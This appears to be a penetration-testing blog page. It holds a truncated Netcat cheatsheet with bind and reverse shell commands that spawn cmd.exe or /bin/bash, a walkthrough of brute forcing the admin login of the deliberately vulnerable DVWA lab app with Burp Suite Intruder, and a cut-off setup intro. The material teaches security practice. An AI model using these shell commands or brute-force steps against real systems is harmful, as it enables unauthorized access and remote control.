Netcat Cheatsheet

  Bind and Reverse Shells (Windows) Netcat bind shell C:\> nc 4444 –exec cmd.exe (Windows) Netcat reverse shell C:\> nc -lp 31337 –exec cmd.exe (Linux) Netcat bind shell victim:~# nc 4444 -e /bin/bash (Linux) Netcat reverse shell victim:~# nc -lp 31337 -e /bin/bash Moving Files On Source: source:~# nc 4444 < input.txt On Destination: destination:~# nc -lp…

DVWA Walkthrough Part 2: Brute Force


The objective of Part 2 of this walkthrough is to brute force the logon mechanism of the Damn Vulnerable Web App (DVWA) in order to obtain a valid username and password of the administrator account. To accomplish this we will use Burp Suite. Before you start make sure you have completed the setup steps in: Burp Suite Tutorial – Part 1: Setup.

In your web browser navigate to http://<IP address>/vulnerabilities/brute/

Next, make sure that “Intercept is on” is enabled and submit the form. Burp will intercept the traffic and display the HTTP request made to the server by your browser. From the Action drop down select “Send to Intruder”.

Screen Shot 2014-11-02 at 8.49.54 PM


Navigate to the Intruder tab. The intruder module is useful for fuzzing specific parameters within a request. The § symbol indicates where Burp will insert it’s payloads into each request.

In this case we want to brute force the username and password arguments. We do not want to brute force the login, PHPSESSID, or security arguments so highlight those and select ‘Clear §’ to remove the placeholders.

Screen Shot 2014-11-02 at 8.50.56 PM

Switch the “Attack type” drop down to Cluster Bomb. This mode will use separate lists to fuzz the username and password arguments and will try all combinations.

Next , select the Payloads tab. For this payload we want to pass in a list of user names. We will use a simple list of usernames in this example.

Screen Shot 2014-11-02 at 8.52.50 PM

Next, select payload 2 from the Payload set drop down. This time we will provide a simple list of passwords to guess.

Screen Shot 2014-11-02 at 8.53.37 PM

Select Intruder > Start attack
Screen Shot 2014-11-02 at 8.53.52 PM

Finally, we can see each request that has been sent to the server, and the combinations of usernames and passwords that we provided.

We can see that the length of the server response in request #1 has changed significantly from the baseline request and other requests. This is interesting and should be investigated. Request #1 has the correct username and password combination. We can validate that we have successfully gained access to the admin account by clicking “Response” > “Render”. Where we are greated with the text “Welcome to the password protected area admin”.

Whenever you are fuzzing with Burp check the Length of the responses as it may be an indication of a weakness.

Screen Shot 2014-11-02 at 8.55.13 PM
Thats it for part 2! You can now see how easy it is to quickly automate HTTP/HTTPS fuzzing using Burp Suite. 

DVWA Walkthrough Part 1: Setup

Damn Vulnerable Web App (DVWA) is an intentionally vulnerable PHP/MySQL web application for penetration testers to use to learn and practice exploiting many types of common web vulnerabilities. GETTING DVWA DVWA code is available from however, there is a preloaded Linux server available from The quickest way to get started is to download the .iso file and boot the…